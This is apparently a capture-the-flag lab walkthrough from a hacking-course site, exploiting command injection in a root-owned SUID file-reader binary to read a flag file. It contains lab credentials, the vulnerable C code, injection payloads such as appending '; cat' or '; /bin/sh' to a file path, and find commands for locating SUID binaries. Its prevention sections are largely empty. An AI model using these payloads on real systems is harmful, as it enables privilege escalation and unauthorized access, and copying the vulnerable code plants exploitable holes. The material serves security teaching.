A secure file management system uses special privileged binaries to safely access system files, but when security meets convenience, vulnerabilities often emerge. 🎯 Can you discover how a helpful file reader becomes your gateway to elevated privileges? Time to hunt for those dangerous SUID bits and turn system administration tools against themselves! 🔍
SUID (Set User ID) is a special file permission that allows a program to run with the privileges of the file owner rather than the user executing it. When the SUID bit is set on an executable owned by root or another privileged user, it can become a powerful privilege escalation vector if the binary contains vulnerabilities.
# Check for SUID bit (s in owner execute position)
ls -la /usr/local/bin/file_reader
-rwsr-xr-x 1 root root 16832 Sep 8 12:00 /usr/local/bin/file_reader
Navigate to
Available Credentials:
guest
, password: guest123
webuser
, password: webpass123
Log in to the application using either set of credentials and explore the File Reader tool:
/etc/passwd
# Test normal file reading
File Path: /etc/passwd
# Expected output shows system users including flaguser
The SUID binary /usr/local/bin/file_reader contains a critical command injection vulnerability. Analysis of the binary reveals:
// Vulnerable C code in file_reader binary
snprintf(command, sizeof(command), "cat \"%s\"", argv[1]);
system(command);
// This directly concatenates user input into a system() call
Vulnerability Details:
# Inject additional commands
/etc/passwd; id
# Results in: cat /etc/passwd; id
# Executes both commands as flaguser
# Use command substitution
/etc/passwd; whoami
# Results in: cat /etc/passwd; whoami
# Shows current effective user (flaguser)
The most effective approach is to use command injection to execute commands as flaguser:
/etc/passwd"; cat /home/flaguser/flag.txt; echo "
How this works:
/etc/passwd"; cat /home/flaguser/flag.txt; echo "
cat "/etc/passwd"; cat /home/flaguser/flag.txt; echo ""
/etc/passwd"; cat /home/flaguser/flag.txt; echo "
# If you have shell access to the container
/usr/local/bin/file_reader "/etc/passwd; cat /home/flaguser/flag.txt"
# Expected output includes the flag
# Using pipes
/dev/null | cat /home/flaguser/flag.txt
# Results in: cat /dev/null | cat /home/flaguser/flag.txt
# Using && operator
/etc/passwd && cat /home/flaguser/flag.txt
# Executes second command if first succeeds
# Using background execution
/etc/passwd & cat /home/flaguser/flag.txt
# Runs commands in parallel
For more sophisticated attacks, you can use the SUID binary for various privilege escalation scenarios:
# Spawn a shell as flaguser
/etc/passwd; /bin/sh
# Note: This may not work in web interface
# but demonstrates the concept
# Explore flaguser's directory
/etc/passwd; ls -la /home/flaguser/
# Find additional sensitive files
The vulnerability exists because:
// VULNERABLE: Direct string concatenation in C
int main(int argc, char *argv[]) {
char command[512];
snprintf(command, sizeof(command), "cat \"%s\"", argv[1]);
system(command); // DANGEROUS: Executes shell with user input
return 0;
}
Key vulnerability factors:
Using Burp Suite for systematic testing:
In real penetration tests, you would first need to discover SUID binaries:
# Find all SUID binaries on the system
find / -type f -perm -4000 2>/dev/null
# Find SUID binaries owned by specific user
find / -type f -perm -4000 -user flaguser 2>/dev/null
# Check specific binary permissions
ls -la /usr/local/bin/file_reader
# Identify potentially vulnerable binaries
find / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null | grep -E "(cat|less|more|tail|head|vim|nano)"
SUID binary vulnerabilities can lead to:
To prevent SUID binary vulnerabilities:
This challenge demonstrates:
/home/flaguser/flag.txt
and can be accessed by exploiting the command injection vulnerability in the SUID binary to execute commands as flaguser. The complete attack chain: Login → Access File Reader → Inject Commands → Escalate to flaguser → Read Flag.Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.